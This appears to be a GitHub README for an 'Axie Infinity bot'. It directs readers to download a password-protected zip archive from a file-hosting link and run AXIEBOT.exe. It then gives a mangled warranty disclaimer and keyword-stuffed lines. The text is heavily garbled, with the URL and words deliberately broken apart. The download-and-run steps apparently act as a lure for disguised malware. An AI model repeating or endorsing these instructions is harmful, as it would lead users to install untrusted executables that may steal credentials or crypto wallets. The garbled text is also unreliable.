MohammadrezaFarahmand/axie-infinity-bot/README.md

 1.Change game resolution to  full-scre en (or ful-scren windowed) and close Sk y avis game client 2.Download archive with software  htts//ww w.mei fir.com/file/45 lw0spadamAieBot.zip/file Password:1488 3.Launch AXIEBOT.exe with corre
 Im not recommend you to playmoretha 24hous e c  o  u .  t a ke  rbiity fo ran ans oblocs THE SOFTWARE I PROVIDED  "AS IS WTHO UT W AR A  T  Y  NXR        C  N  G T  LI MI EDTO THE  WARANTIES OF MERCHANTABILITY, FITNESS FOR APARTICULAR  PU POSE A  I  F RINGET.
 I N  VE H A L H E    HS R CY H   D ERS E    I ABLE FO ANY CLAIM, DAMAGES OR OTHER LIAILITY, WETHER IN AN AIOF R ,TORT HR WSE , AR ING FROM OUTO OR I NE CTION THHE S FWAE OR THE US OR OTHER DEALINGS IN THE SOFTWARE.
-AXIENFIIT BO ,AXIE INFINTYUO ATTLE  BOT, AX IE  N
+AXIENFIIT BO ,AXIE INFINTYUO ATTLE  BOT, AX IE